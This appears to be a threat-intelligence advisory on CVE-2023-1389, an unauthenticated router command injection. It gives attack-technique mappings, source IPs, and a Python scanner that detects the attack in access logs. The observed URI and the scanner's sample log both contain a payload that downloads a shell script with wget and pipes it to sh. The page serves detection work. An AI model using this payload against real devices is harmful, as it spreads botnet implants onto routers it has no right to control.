OpenWRT Luci CGI Command Injection (CVE-2023-1389) for 2026-03-13
Mar 13, 2026
WebExploit
Last Updated: 12:12 UTC
Unauthenticated OS command injection via the country parameter of /cgi-bin/luci/;stok=/locale. The ;stok= path segment bypasses CSRF token validation, making the injection exploitable without credentials. Active exploitation payloads download and execute Mirai-family botnet implants via wget or curl from attacker-controlled infrastructure.
CVE References
MITRE ATT&CK
Tactic: Initial Access (TA0001)
Technique: T1190 — Exploit Public-Facing Application
Observed URIs
/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A//0.0.0.0/router.tplink.sh%20-O-%7Csh)/cgi-bin/luci/;stok=/locale
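As an added detection example (not part of this report or of any vendor tooling), the following Python scanner flags the injection pattern above in web-server or honeypot access logs; the log lines and source IPs are constructed, and the shell-metacharacter check generalizes beyond the single `$(...)` form observed here:

```python
import re
from urllib.parse import urlsplit, parse_qs

# Path that reaches the locale handler with an empty ;stok= session token
LOCALE_PATH = "/cgi-bin/luci/;stok=/locale"
# Shell metacharacters that never belong in a two-letter country code
SHELL_META = re.compile(r"[$`;|&<>()]")

# Constructed access log lines for illustration only (not real traffic)
SAMPLE_LOG = """\
10.0.0.5 - - [13/Mar/2026:12:01:02 +0000] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A//0.0.0.0/router.tplink.sh%20-O-%7Csh) HTTP/1.1" 200 12
10.0.0.9 - - [13/Mar/2026:12:01:05 +0000] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=read HTTP/1.1" 200 40
10.0.0.7 - - [13/Mar/2026:12:01:07 +0000] "GET /cgi-bin/luci/;stok=abc123/locale?form=country&operation=write&country=US HTTP/1.1" 200 12
"""

# Common log format: ip ident user [timestamp] "METHOD URI PROTO" status bytes
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<uri>\S+) [^"]*"'
)


def is_cve_2023_1389_attempt(uri: str) -> bool:
    """True when the URI is a write to the country parameter through the
    token-less locale endpoint and the value carries shell metacharacters."""
    parts = urlsplit(uri)  # urlsplit keeps the ';stok=' segment inside the path
    if not parts.path.startswith(LOCALE_PATH):
        return False
    qs = parse_qs(parts.query, keep_blank_values=True)  # percent-decodes values
    if qs.get("form") != ["country"] or qs.get("operation") != ["write"]:
        return False
    country = qs.get("country", [""])[0]
    return bool(SHELL_META.search(country))


def scan_access_log(text: str) -> list[dict]:
    """Return one finding per matching line: source IP, timestamp, decoded payload."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m or not is_cve_2023_1389_attempt(m["uri"]):
            continue
        payload = parse_qs(urlsplit(m["uri"]).query)["country"][0]
        findings.append({"ip": m["ip"], "ts": m["ts"], "payload": payload})
    return findings


if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} CVE-2023-1389 attempt: {f['payload']}")
```

Legitimate writes that carry a real session token (third sample line) or read-only operations (second line) are not flagged, so the rule can run as a low-noise alert on edge or honeypot logs.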
Attackers by Country
IP Address : ASN : City/Provider
- 221.159.119.6 : unknown : unknown
- 95.214.55.63 : unknown : unknown